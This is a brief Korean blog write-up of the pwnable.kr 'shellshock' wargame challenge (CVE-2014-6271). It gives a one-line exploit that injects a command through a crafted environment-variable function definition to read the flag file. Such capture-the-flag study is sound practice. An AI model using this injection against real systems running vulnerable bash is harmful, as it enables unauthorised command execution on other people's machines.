pwnable.kr - shellshock

2018. 8. 23. 10:08WarGame/pwnable.kr

이번에 작성할 shellshock취약점은 CVE-2014-6271입니다.

CVE라니 신기했어요 ㅎㅎ

shellshock이 뭘까요..?

http://baobob1024.tistory.com/42

이분의 블로그를 참고해서 많이 배웠습니다.

"입력값 이 제대로 검사되지않는 버그라고 보시면 간편할 것 같습니다"


익스방법은 다음과 같습니다.




exploit = env x='() { :;}; /bin/cat flag' ./shellshock


(grin)

저작자표시 비영리 동일조건

'WarGame > pwnable.kr' 카테고리의 다른 글

pwnable.kr - passcode  (0) 2018.08.25
pwnable.kr - flag  (0) 2018.08.24
pwnable.kr - leg  (0) 2018.08.22
pwnable.kr - mistake  (0) 2018.08.20
pwnable.kr blukat  (0) 2018.08.19

관련글

댓글 0

티스토리툴바